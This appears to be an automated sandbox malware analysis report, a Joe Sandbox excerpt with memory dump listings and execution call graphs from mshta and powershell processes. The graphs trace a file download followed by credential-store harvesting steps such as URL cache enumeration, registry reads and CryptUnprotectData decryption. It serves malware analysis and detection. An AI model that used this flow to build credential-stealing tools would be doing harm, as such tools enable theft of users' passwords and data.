                                                                                                                                                                                  • Source File: 00000004.00000003.426554194.00000000035C0000.00000010.00000800.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_4_3_35c0000_mshta.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                  • Instruction ID: 45e170f83687252b727edd45f3b39d431e6b69e8d7fe941d490773f679e3d818
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:4.7%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:50%
                                                                                                                                                                                  Total number of Nodes:6
                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                  execution_graph 2473 7fe899c4b18 2474 7fe899c5a40 URLDownloadToFileW 2473->2474 2476 7fe899c5b10 2474->2476 2469 7fe899c59f1 2471 7fe899c5a01 URLDownloadToFileW 2469->2471 2472 7fe899c5b10 2471->2472

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.455884233.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7fe899c0000_powershell.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DownloadFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1407266417-0
                                                                                                                                                                                  • Opcode ID: f9bb48566b8a8713db188f66dd08dba335d72fc7a8ea6332beab3c7c899ed28d
                                                                                                                                                                                  • Instruction ID: 0fd39b7818fca3ca73efb3d9c9ca275204db205e70f59f2811741eb3bba922f4
                                                                                                                                                                                  • Opcode Fuzzy Hash: f9bb48566b8a8713db188f66dd08dba335d72fc7a8ea6332beab3c7c899ed28d
                                                                                                                                                                                  • Instruction Fuzzy Hash: CB31703191CA5C8FDB58DF5C98857A9BBE1FB69715F00822ED04ED3661CB70A8458B81

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.455884233.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7fe899c0000_powershell.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DownloadFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1407266417-0
                                                                                                                                                                                  • Opcode ID: 4eb14410ff6a37505ca03640c505f2fe2ae47be4f04cb48e65c452d7a4318378
                                                                                                                                                                                  • Instruction ID: c70b8806b6cbf1da65165165ae70fb2f57ea280841a98dc75a3b89f6dcafc163
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4eb14410ff6a37505ca03640c505f2fe2ae47be4f04cb48e65c452d7a4318378
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7241E43191CB889FDB19DB589C447EABBF4FB66325F04826FD08DD3162CB246846C782

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.456050358.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 50e46cb7a64d88ae55e0acf1998f055cf9f38bbb5dd64610feefa5db64873083
                                                                                                                                                                                  • Instruction ID: f6e8872ed1469d081c51230cdc1cc5e787fe14880d5c117e05c8e422a8bf4e0a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 50e46cb7a64d88ae55e0acf1998f055cf9f38bbb5dd64610feefa5db64873083
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4822E43090CB894FE759EB2C8454669BFE2FF9A344F2401EED48EC72A3DA25AC55C741

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.456050358.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7fe89a90000_powershell.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b7734741fe9a3fbdd104ba0bc8ccd96d09d76e0af5fb23faa1e3391216507344
                                                                                                                                                                                  • Instruction ID: 0bce622fe825800b91f382164a61ec368495551494493162141753348ce1a23b
                                                                                                                                                                                  • Opcode Fuzzy Hash: b7734741fe9a3fbdd104ba0bc8ccd96d09d76e0af5fb23faa1e3391216507344
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EA1E321A0EBC90FE347973C58642657FE1EF57254B2A01EBC48DCB2B3D9199C5AC362
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000010.00000003.470628741.0000000003860000.00000010.00000800.00020000.00000000.sdmp, Offset: 03860000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_16_3_3860000_mshta.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                  • Instruction ID: 30ff4598f0e4eac8d6253df818a0c1ecf9497428264be48db0637c5963cbd779
                                                                                                                                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                                                                                                  • Instruction Fuzzy Hash:

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:5.6%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                  Signature Coverage:2.9%
                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                  Total number of Limit Nodes:59
38509->38512 38513 4099f4 3 API calls 38509->38513 39140 413f27 38510->39140 38512->38509 38513->38509 38514 413e37 GetModuleHandleW 38516 413e46 GetProcAddress 38514->38516 38518 413e1f 38514->38518 38516->38518 38517 413e6a QueryFullProcessImageNameW 38517->38518 38518->38514 38518->38517 39145 413959 38518->39145 39161 413ca4 38518->39161 38520 413ea2 CloseHandle 38520->38509 38522 414c2e 17 API calls 38521->38522 38523 403eb7 38522->38523 38524 414c2e 17 API calls 38523->38524 38525 403ec5 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 403ee2 38526->38527 38528 409d1f 6 API calls 38527->38528 38529 403efd 38528->38529 38530 409d1f 6 API calls 38529->38530 38531 403f15 38530->38531 38532 403af5 20 API calls 38531->38532 38533 403f29 38532->38533 38534 403af5 20 API calls 38533->38534 38535 403f3a 38534->38535 38536 40414f 33 API calls 38535->38536 38537 403f4f 38536->38537 38538 403faf 38537->38538 38539 403f5b memset 38537->38539 38542 4099c6 2 API calls 38537->38542 38543 40a8ab 9 API calls 38537->38543 39175 40b1ab free free 38538->39175 38539->38537 38541 403fb7 38541->38191 38542->38537 38543->38537 38545 414c2e 17 API calls 38544->38545 38546 403d26 38545->38546 38547 414c2e 17 API calls 38546->38547 38548 403d34 38547->38548 38549 409d1f 6 API calls 38548->38549 38550 403d51 38549->38550 38551 409d1f 6 API calls 38550->38551 38552 403d6c 38551->38552 38553 409d1f 6 API calls 38552->38553 38554 403d84 38553->38554 38555 403af5 20 API calls 38554->38555 38556 403d98 38555->38556 38557 403af5 20 API calls 38556->38557 38558 403da9 38557->38558 38559 40414f 33 API calls 38558->38559 38564 403dbe 38559->38564 38560 403e1e 39176 40b1ab free free 38560->39176 38562 403dca memset 38562->38564 38563 403e26 38563->38195 38564->38560 38564->38562 38565 4099c6 2 API calls 38564->38565 38566 40a8ab 9 API calls 38564->38566 38565->38564 38566->38564 38568 414b81 9 API calls 38567->38568 38569 414c40 38568->38569 38570 414c73 memset 38569->38570 39177 409cea 
38569->39177 38571 414c94 38570->38571 39180 414592 RegOpenKeyExW 38571->39180 38575 414c64 SHGetSpecialFolderPathW 38576 414d0b 38575->38576 38576->38211 38577 414cc1 38578 414cf4 wcscpy 38577->38578 39181 414bb0 wcscpy 38577->39181 38578->38576 38580 414cd2 39182 4145ac RegQueryValueExW 38580->39182 38582 414ce9 RegCloseKey 38582->38578 38584 409d62 38583->38584 38585 409d43 wcscpy 38583->38585 38588 445389 38584->38588 38586 409719 2 API calls 38585->38586 38587 409d51 wcscat 38586->38587 38587->38584 38589 40ae18 9 API calls 38588->38589 38595 4453c4 38589->38595 38590 40ae51 9 API calls 38590->38595 38591 4453f3 38593 40aebe FindClose 38591->38593 38592 40add4 2 API calls 38592->38595 38594 4453fe 38593->38594 38594->38253 38595->38590 38595->38591 38595->38592 38596 445403 254 API calls 38595->38596 38596->38595 38597->38194 38598->38250 38599->38239 38600->38239 38601->38265 38603 409c89 38602->38603 38603->38288 38604->38318 38606 413d39 38605->38606 38607 413d2f FreeLibrary 38605->38607 38608 40b633 free 38606->38608 38607->38606 38609 413d42 38608->38609 38610 40b633 free 38609->38610 38611 413d4a 38610->38611 38611->38145 38612->38149 38613->38197 38614->38212 38616 44db70 38615->38616 38617 40b6fc memset 38616->38617 38618 409c70 2 API calls 38617->38618 38619 40b732 wcsrchr 38618->38619 38620 40b743 38619->38620 38621 40b746 memset 38619->38621 38620->38621 38622 40b2cc 27 API calls 38621->38622 38623 40b76f 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 40b783 38624->38625 39183 409b98 GetFileAttributesW 38625->39183 38627 40b792 38628 40b7c2 38627->38628 38629 409c70 2 API calls 38627->38629 39184 40bb98 38628->39184 38631 40b7a5 38629->38631 38633 40b2cc 27 API calls 38631->38633 38636 40b7b2 38633->38636 38634 40b837 CloseHandle 38638 40b83e memset 38634->38638 38635 40b817 39267 409a45 GetTempPathW 38635->39267 38639 409d1f 6 API calls 38636->38639 39217 40a6e6 WideCharToMultiByte 38638->39217 38639->38628 38640 40b827 CopyFileW 
38640->38638 38642 40b866 39218 444432 38642->39218 38645 40bad5 38647 40baeb 38645->38647 38648 40bade DeleteFileW 38645->38648 38646 40b273 27 API calls 38649 40b89a 38646->38649 38650 40b04b ??3@YAXPAX 38647->38650 38648->38647 39264 438552 38649->39264 38652 40baf3 38650->38652 38652->38222 38654 40bacd 39298 443d90 111 API calls 38654->39298 38657 40bac6 39297 424f26 123 API calls 38657->39297 38658 40b8bd memset 39288 425413 17 API calls 38658->39288 38661 425413 17 API calls 38678 40b8b8 38661->38678 38664 40a71b MultiByteToWideChar 38664->38678 38667 40b9b5 memcmp 38667->38678 38668 4099c6 2 API calls 38668->38678 38669 404423 38 API calls 38669->38678 38672 40bb3e memset memcpy 39299 40a734 MultiByteToWideChar 38672->39299 38673 4251c4 137 API calls 38673->38678 38675 40bb88 LocalFree 38675->38678 38678->38657 38678->38658 38678->38661 38678->38664 38678->38667 38678->38668 38678->38669 38678->38672 38678->38673 38679 40ba5f memcmp 38678->38679 38680 40a734 MultiByteToWideChar 38678->38680 39289 4253ef 16 API calls 38678->39289 39290 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38678->39290 39291 4253af 17 API calls 38678->39291 39292 4253cf 17 API calls 38678->39292 39293 447280 memset 38678->39293 39294 447960 memset memcpy memcpy memcpy 38678->39294 39295 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38678->39295 39296 447920 memcpy memcpy memcpy 38678->39296 38679->38678 38680->38678 38681->38224 38683 40aebe FindClose 38682->38683 38684 40ae21 38683->38684 38685 4099c6 2 API calls 38684->38685 38686 40ae35 38685->38686 38687 409d1f 6 API calls 38686->38687 38688 40ae49 38687->38688 38688->38264 38690 40ade0 38689->38690 38691 40ae0f 38689->38691 38690->38691 38692 40ade7 wcscmp 38690->38692 38691->38264 38692->38691 38693 40adfe wcscmp 38692->38693 38693->38691 38695 40ae7b FindNextFileW 38694->38695 38696 40ae5c FindFirstFileW 38694->38696 38697 40ae94 38695->38697 38698 40ae8f 38695->38698 38696->38697 38699 409d1f 6 API calls 38697->38699 38701 40aeb6 
38697->38701 38700 40aebe FindClose 38698->38700 38699->38701 38700->38697 38701->38264 38703 40aed1 38702->38703 38704 40aec7 FindClose 38702->38704 38703->38278 38704->38703 38706 4099d7 38705->38706 38707 4099da memcpy 38705->38707 38706->38707 38707->38208 38709 40b2cc 27 API calls 38708->38709 38710 44543f 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 44544f 38711->38712 39657 409b98 GetFileAttributesW 38712->39657 38714 445476 38717 40b2cc 27 API calls 38714->38717 38715 44545e 38715->38714 38716 40b6ef 253 API calls 38715->38716 38716->38714 38718 445482 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 445492 38719->38720 39658 409b98 GetFileAttributesW 38720->39658 38722 4454a1 38723 4454b9 38722->38723 38724 40b6ef 253 API calls 38722->38724 38723->38237 38724->38723 38725->38236 38726->38254 38727->38261 38728->38299 38729->38281 38730->38326 38731->38326 38732->38308 38733->38337 38734->38339 38735->38341 38737 414c2e 17 API calls 38736->38737 38738 40c2ae 38737->38738 38794 40c1d3 38738->38794 38743 40c3be 38760 40a8ab 38743->38760 38744 40afcf 2 API calls 38745 40c2fd FindFirstUrlCacheEntryW 38744->38745 38746 40c3b6 38745->38746 38747 40c31e wcschr 38745->38747 38748 40b04b ??3@YAXPAX 38746->38748 38749 40c331 38747->38749 38750 40c35e FindNextUrlCacheEntryW 38747->38750 38748->38743 38751 40a8ab 9 API calls 38749->38751 38750->38747 38752 40c373 GetLastError 38750->38752 38755 40c33e wcschr 38751->38755 38753 40c3ad FindCloseUrlCache 38752->38753 38754 40c37e 38752->38754 38753->38746 38756 40afcf 2 API calls 38754->38756 38755->38750 38757 40c34f 38755->38757 38758 40c391 FindNextUrlCacheEntryW 38756->38758 38759 40a8ab 9 API calls 38757->38759 38758->38747 38758->38753 38759->38750 38888 40a97a 38760->38888 38763 40a8cc 38763->38348 38764 40a8d0 7 API calls 38764->38763 38893 40b1ab free free 38765->38893 38767 40c3dd 38768 40b2cc 27 API calls 38767->38768 38769 40c3e7 38768->38769 38894 414592 RegOpenKeyExW 38769->38894 38771 
40c3f4 38772 40c50e 38771->38772 38773 40c3ff 38771->38773 38787 405337 38772->38787 38774 40a9ce 4 API calls 38773->38774 38775 40c418 memset 38774->38775 38895 40aa1d 38775->38895 38778 40c471 38780 40c47a _wcsupr 38778->38780 38779 40c505 RegCloseKey 38779->38772 38781 40a8d0 7 API calls 38780->38781 38782 40c498 38781->38782 38783 40a8d0 7 API calls 38782->38783 38784 40c4ac memset 38783->38784 38785 40aa1d 38784->38785 38786 40c4e4 RegEnumValueW 38785->38786 38786->38779 38786->38780 38897 405220 38787->38897 38790->38359 38791->38361 38792->38362 38793->38355 38795 40ae18 9 API calls 38794->38795 38801 40c210 38795->38801 38796 40ae51 9 API calls 38796->38801 38797 40c264 38798 40aebe FindClose 38797->38798 38800 40c26f 38798->38800 38799 40add4 2 API calls 38799->38801 38806 40e5ed memset memset 38800->38806 38801->38796 38801->38797 38801->38799 38802 40c231 _wcsicmp 38801->38802 38803 40c1d3 35 API calls 38801->38803 38802->38801 38804 40c248 38802->38804 38803->38801 38819 40c084 22 API calls 38804->38819 38807 414c2e 17 API calls 38806->38807 38808 40e63f 38807->38808 38809 409d1f 6 API calls 38808->38809 38810 40e658 38809->38810 38820 409b98 GetFileAttributesW 38810->38820 38812 40e667 38813 40e680 38812->38813 38815 409d1f 6 API calls 38812->38815 38821 409b98 GetFileAttributesW 38813->38821 38815->38813 38816 40e68f 38818 40c2d8 38816->38818 38822 40e4b2 38816->38822 38818->38743 38818->38744 38819->38801 38820->38812 38821->38816 38843 40e01e 38822->38843 38824 40e593 38825 40e5b0 38824->38825 38826 40e59c DeleteFileW 38824->38826 38828 40b04b ??3@YAXPAX 38825->38828 38826->38825 38827 40e521 38827->38824 38866 40e175 38827->38866 38829 40e5bb 38828->38829 38831 40e5c4 CloseHandle 38829->38831 38832 40e5cc 38829->38832 38831->38832 38834 40b633 free 38832->38834 38833 40e573 38836 40e584 38833->38836 38837 40e57c CloseHandle 38833->38837 38835 40e5db 38834->38835 38840 40b633 free 38835->38840 38887 40b1ab free free 38836->38887 38837->38836 38839 
40e540 38839->38833 38886 40e2ab 30 API calls 38839->38886 38841 40e5e3 38840->38841 38841->38818 38844 406214 22 API calls 38843->38844 38845 40e03c 38844->38845 38846 40e16b 38845->38846 38847 40dd85 75 API calls 38845->38847 38846->38827 38848 40e06b 38847->38848 38848->38846 38849 40afcf ??2@YAPAXI ??3@YAXPAX 38848->38849 38850 40e08d OpenProcess 38849->38850 38851 40e0a4 GetCurrentProcess DuplicateHandle 38850->38851 38855 40e152 38850->38855 38852 40e0d0 GetFileSize 38851->38852 38853 40e14a CloseHandle 38851->38853 38856 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38852->38856 38853->38855 38854 40e160 38858 40b04b ??3@YAXPAX 38854->38858 38855->38854 38857 406214 22 API calls 38855->38857 38859 40e0ea 38856->38859 38857->38854 38858->38846 38860 4096dc CreateFileW 38859->38860 38861 40e0f1 CreateFileMappingW 38860->38861 38862 40e140 CloseHandle CloseHandle 38861->38862 38863 40e10b MapViewOfFile 38861->38863 38862->38853 38864 40e13b CloseHandle 38863->38864 38865 40e11f WriteFile UnmapViewOfFile 38863->38865 38864->38862 38865->38864 38867 40e18c 38866->38867 38868 406b90 11 API calls 38867->38868 38869 40e19f 38868->38869 38870 40e1a7 memset 38869->38870 38871 40e299 38869->38871 38876 40e1e8 38870->38876 38872 4069a3 ??3@YAXPAX free 38871->38872 38873 40e2a4 38872->38873 38873->38839 38874 406e8f 13 API calls 38874->38876 38875 406b53 SetFilePointerEx ReadFile 38875->38876 38876->38874 38876->38875 38877 40e283 38876->38877 38878 40dd50 _wcsicmp 38876->38878 38882 40742e 8 API calls 38876->38882 38883 40aae3 wcslen wcslen _memicmp 38876->38883 38884 40e244 _snwprintf 38876->38884 38879 40e291 38877->38879 38880 40e288 free 38877->38880 38878->38876 38881 40aa04 free 38879->38881 38880->38879 38881->38871 38882->38876 38883->38876 38885 40a8d0 7 API calls 38884->38885 38885->38876 38886->38839 38887->38824 38892 40a980 38888->38892 38889 40a8bb 38889->38763 38889->38764 38890 40a995 _wcsicmp 38890->38892 38891 40a99c wcscmp 38891->38892 
38892->38889 38892->38890 38892->38891 38893->38767 38894->38771 38896 40aa23 RegEnumValueW 38895->38896 38896->38778 38896->38779 38898 405335 38897->38898 38899 40522a 38897->38899 38898->38362 38900 40b2cc 27 API calls 38899->38900 38901 405234 38900->38901 38902 40a804 8 API calls 38901->38902 38903 40523a 38902->38903 38942 40b273 38903->38942 38905 405248 _mbscpy _mbscat GetProcAddress 38906 40b273 27 API calls 38905->38906 38907 405279 38906->38907 38945 405211 GetProcAddress 38907->38945 38909 405282 38910 40b273 27 API calls 38909->38910 38911 40528f 38910->38911 38946 405211 GetProcAddress 38911->38946 38913 405298 38914 40b273 27 API calls 38913->38914 38915 4052a5 38914->38915 38947 405211 GetProcAddress 38915->38947 38917 4052ae 38918 40b273 27 API calls 38917->38918 38919 4052bb 38918->38919 38948 405211 GetProcAddress 38919->38948 38921 4052c4 38922 40b273 27 API calls 38921->38922 38923 4052d1 38922->38923 38949 405211 GetProcAddress 38923->38949 38925 4052da 38926 40b273 27 API calls 38925->38926 38927 4052e7 38926->38927 38950 405211 GetProcAddress 38927->38950 38929 4052f0 38930 40b273 27 API calls 38929->38930 38931 4052fd 38930->38931 38951 405211 GetProcAddress 38931->38951 38933 405306 38934 40b273 27 API calls 38933->38934 38935 405313 38934->38935 38952 405211 GetProcAddress 38935->38952 38937 40531c 38938 40b273 27 API calls 38937->38938 38939 405329 38938->38939 38953 405211 GetProcAddress 38939->38953 38943 40b58d 27 API calls 38942->38943 38944 40b18c 38943->38944 38944->38905 38945->38909 38946->38913 38947->38917 38948->38921 38949->38925 38950->38929 38951->38933 38952->38937 38955 40440c FreeLibrary 38954->38955 38956 40436d 38955->38956 38957 40a804 8 API calls 38956->38957 38958 404377 38957->38958 38959 404383 38958->38959 38960 404405 38958->38960 38961 40b273 27 API calls 38959->38961 38960->38366 38960->38370 38962 40438d GetProcAddress 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4043a7 GetProcAddress 
38963->38964 38965 40b273 27 API calls 38964->38965 38966 4043ba GetProcAddress 38965->38966 38967 40b273 27 API calls 38966->38967 38968 4043ce GetProcAddress 38967->38968 38969 40b273 27 API calls 38968->38969 38970 4043e2 GetProcAddress 38969->38970 38971 4043f1 38970->38971 38972 4043f7 38971->38972 38973 40440c FreeLibrary 38971->38973 38972->38960 38973->38960 38975 404413 FreeLibrary 38974->38975 38976 40441e 38974->38976 38975->38976 38976->38382 38977->38374 38979 40447e 38978->38979 38980 40442e 38978->38980 38981 404485 CryptUnprotectData 38979->38981 38982 40449c 38979->38982 38983 40b2cc 27 API calls 38980->38983 38981->38982 38982->38374 38984 404438 38983->38984 38985 40a804 8 API calls 38984->38985 38986 40443e 38985->38986 38987 404445 38986->38987 38988 404467 38986->38988 38989 40b273 27 API calls 38987->38989 38988->38979 38990 404475 FreeLibrary 38988->38990 38991 40444f GetProcAddress 38989->38991 38990->38979 38991->38988 38992 404460 38991->38992 38992->38988 38994 4135f6 38993->38994 38995 4135eb FreeLibrary 38993->38995 38994->38385 38995->38994 38997 4449c4 38996->38997 38998 444a52 38996->38998 38999 40b2cc 27 API calls 38997->38999 38998->38405 38998->38406 39000 4449cb 38999->39000 39001 40a804 8 API calls 39000->39001 39002 4449d1 39001->39002 39003 40b273 27 API calls 39002->39003 39004 4449dc GetProcAddress 39003->39004 39005 40b273 27 API calls 39004->39005 39006 4449f3 GetProcAddress 39005->39006 39007 40b273 27 API calls 39006->39007 39008 444a04 GetProcAddress 39007->39008 39009 40b273 27 API calls 39008->39009 39010 444a15 GetProcAddress 39009->39010 39011 40b273 27 API calls 39010->39011 39012 444a26 GetProcAddress 39011->39012 39013 40b273 27 API calls 39012->39013 39014 444a37 GetProcAddress 39013->39014 39017->38416 39018->38416 39019->38416 39020->38416 39021->38407 39023 403a29 39022->39023 39037 403bed memset memset 39023->39037 39025 403ae7 39050 40b1ab free free 39025->39050 39026 403a3f memset 39031 403a2f 
39026->39031 39028 403aef 39028->38423 39029 40a8d0 7 API calls 39029->39031 39030 409d1f 6 API calls 39030->39031 39031->39025 39031->39026 39031->39029 39031->39030 39032 409b98 GetFileAttributesW 39031->39032 39032->39031 39034 40a051 GetFileTime CloseHandle 39033->39034 39035 4039ca CompareFileTime 39033->39035 39034->39035 39035->38423 39036->38424 39038 414c2e 17 API calls 39037->39038 39039 403c38 39038->39039 39040 409719 2 API calls 39039->39040 39041 403c3f wcscat 39040->39041 39042 414c2e 17 API calls 39041->39042 39043 403c61 39042->39043 39044 409719 2 API calls 39043->39044 39045 403c68 wcscat 39044->39045 39051 403af5 39045->39051 39048 403af5 20 API calls 39049 403c95 39048->39049 39049->39031 39050->39028 39052 403b02 39051->39052 39053 40ae18 9 API calls 39052->39053 39061 403b37 39053->39061 39054 403bdb 39056 40aebe FindClose 39054->39056 39055 40add4 wcscmp wcscmp 39055->39061 39057 403be6 39056->39057 39057->39048 39058 40ae18 9 API calls 39058->39061 39059 40ae51 9 API calls 39059->39061 39060 40aebe FindClose 39060->39061 39061->39054 39061->39055 39061->39058 39061->39059 39061->39060 39062 40a8d0 7 API calls 39061->39062 39062->39061 39064 409d1f 6 API calls 39063->39064 39065 404190 39064->39065 39078 409b98 GetFileAttributesW 39065->39078 39067 40419c 39068 4041a7 6 API calls 39067->39068 39069 40435c 39067->39069 39071 40424f 39068->39071 39069->38450 39071->39069 39072 40425e memset 39071->39072 39074 409d1f 6 API calls 39071->39074 39075 40a8ab 9 API calls 39071->39075 39079 414842 39071->39079 39072->39071 39073 404296 wcscpy 39072->39073 39073->39071 39074->39071 39076 4042b6 memset memset _snwprintf wcscpy 39075->39076 39076->39071 39077->38448 39078->39067 39082 41443e 39079->39082 39081 414866 39081->39071 39083 41444b 39082->39083 39084 414451 39083->39084 39085 4144a3 GetPrivateProfileStringW 39083->39085 39086 414491 39084->39086 39087 414455 wcschr 39084->39087 39085->39081 39089 414495 WritePrivateProfileStringW 39086->39089 
39087->39086 39088 414463 _snwprintf 39087->39088 39088->39089 39089->39081 39090->38454 39092 40b2cc 27 API calls 39091->39092 39093 409615 39092->39093 39094 409d1f 6 API calls 39093->39094 39095 409625 39094->39095 39118 409b98 GetFileAttributesW 39095->39118 39097 409634 39098 409648 39097->39098 39135 4091b8 241 API calls 39097->39135 39100 40b2cc 27 API calls 39098->39100 39102 408801 39098->39102 39101 40965d 39100->39101 39103 409d1f 6 API calls 39101->39103 39102->38457 39102->38458 39104 40966d 39103->39104 39119 409b98 GetFileAttributesW 39104->39119 39106 40967c 39106->39102 39120 409529 39106->39120 39118->39097 39119->39106 39136 4096c3 CreateFileW 39120->39136 39122 409543 39123 409550 GetFileSize 39122->39123 39134 4095cd 39122->39134 39124 409577 CloseHandle 39123->39124 39125 40955f 39123->39125 39131 409585 39124->39131 39124->39134 39126 40afcf 2 API calls 39125->39126 39127 409569 39126->39127 39137 40a2ef ReadFile 39127->39137 39129 409574 39129->39124 39130 4095c3 39139 40908b 57 API calls 39130->39139 39131->39130 39131->39134 39138 408b8d 38 API calls 39131->39138 39134->39102 39135->39098 39136->39122 39137->39129 39138->39131 39139->39134 39167 413f4f 39140->39167 39143 413f37 K32GetModuleFileNameExW 39144 413f4a 39143->39144 39144->38518 39146 413969 wcscpy 39145->39146 39147 41396c wcschr 39145->39147 39158 413a3a 39146->39158 39147->39146 39149 41398e 39147->39149 39172 4097f7 wcslen wcslen _memicmp 39149->39172 39151 41399a 39152 4139a4 memset 39151->39152 39153 4139e6 39151->39153 39173 409dd5 GetWindowsDirectoryW wcscpy 39152->39173 39154 413a31 wcscpy 39153->39154 39155 4139ec memset 39153->39155 39154->39158 39174 409dd5 GetWindowsDirectoryW wcscpy 39155->39174 39158->38518 39159 4139c9 wcscpy wcscat 39159->39158 39160 413a11 memcpy wcscat 39160->39158 39162 413cb0 GetModuleHandleW 39161->39162 39163 413cda 39161->39163 39162->39163 39164 413cbf GetProcAddress 39162->39164 39165 413ce3 GetProcessTimes 39163->39165 39166 413cf6 
39163->39166 39164->39163 39165->38520 39166->38520 39168 413f2f 39167->39168 39169 413f54 39167->39169 39168->39143 39168->39144 39170 40a804 8 API calls 39169->39170 39171 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39170->39171 39171->39168 39172->39151 39173->39159 39174->39160 39175->38541 39176->38563 39178 409cf9 GetVersionExW 39177->39178 39179 409d0a 39177->39179 39178->39179 39179->38570 39179->38575 39180->38577 39181->38580 39182->38582 39183->38627 39185 40bba5 39184->39185 39300 40cc26 39185->39300 39188 40bd4b 39321 40cc0c 39188->39321 39193 40b2cc 27 API calls 39194 40bbef 39193->39194 39328 40ccf0 _wcsicmp 39194->39328 39196 40bbf5 39196->39188 39329 40ccb4 6 API calls 39196->39329 39198 40bc26 39199 40cf04 17 API calls 39198->39199 39200 40bc2e 39199->39200 39201 40bd43 39200->39201 39202 40b2cc 27 API calls 39200->39202 39203 40cc0c 4 API calls 39201->39203 39204 40bc40 39202->39204 39203->39188 39330 40ccf0 _wcsicmp 39204->39330 39206 40bc46 39206->39201 39207 40bc61 memset memset WideCharToMultiByte 39206->39207 39331 40103c strlen 39207->39331 39209 40bcc0 39210 40b273 27 API calls 39209->39210 39211 40bcd0 memcmp 39210->39211 39211->39201 39212 40bce2 39211->39212 39213 404423 38 API calls 39212->39213 39214 40bd10 39213->39214 39214->39201 39215 40bd3a LocalFree 39214->39215 39216 40bd1f memcpy 39214->39216 39215->39201 39216->39215 39217->38642 39391 4438b5 39218->39391 39220 44444c 39226 40b879 39220->39226 39405 415a6d 39220->39405 39222 444486 39225 4444b9 memcpy 39222->39225 39263 4444a4 39222->39263 39224 44469e 39224->39226 39456 443d90 111 API calls 39224->39456 39409 415258 39225->39409 39226->38645 39226->38646 39229 444524 39230 444541 39229->39230 39231 44452a 39229->39231 39412 444316 39230->39412 39446 416935 16 API calls 39231->39446 39235 444316 18 API calls 39236 444563 39235->39236 39237 444316 18 API calls 39236->39237 39238 44456f 39237->39238 39239 444316 18 API calls 39238->39239 
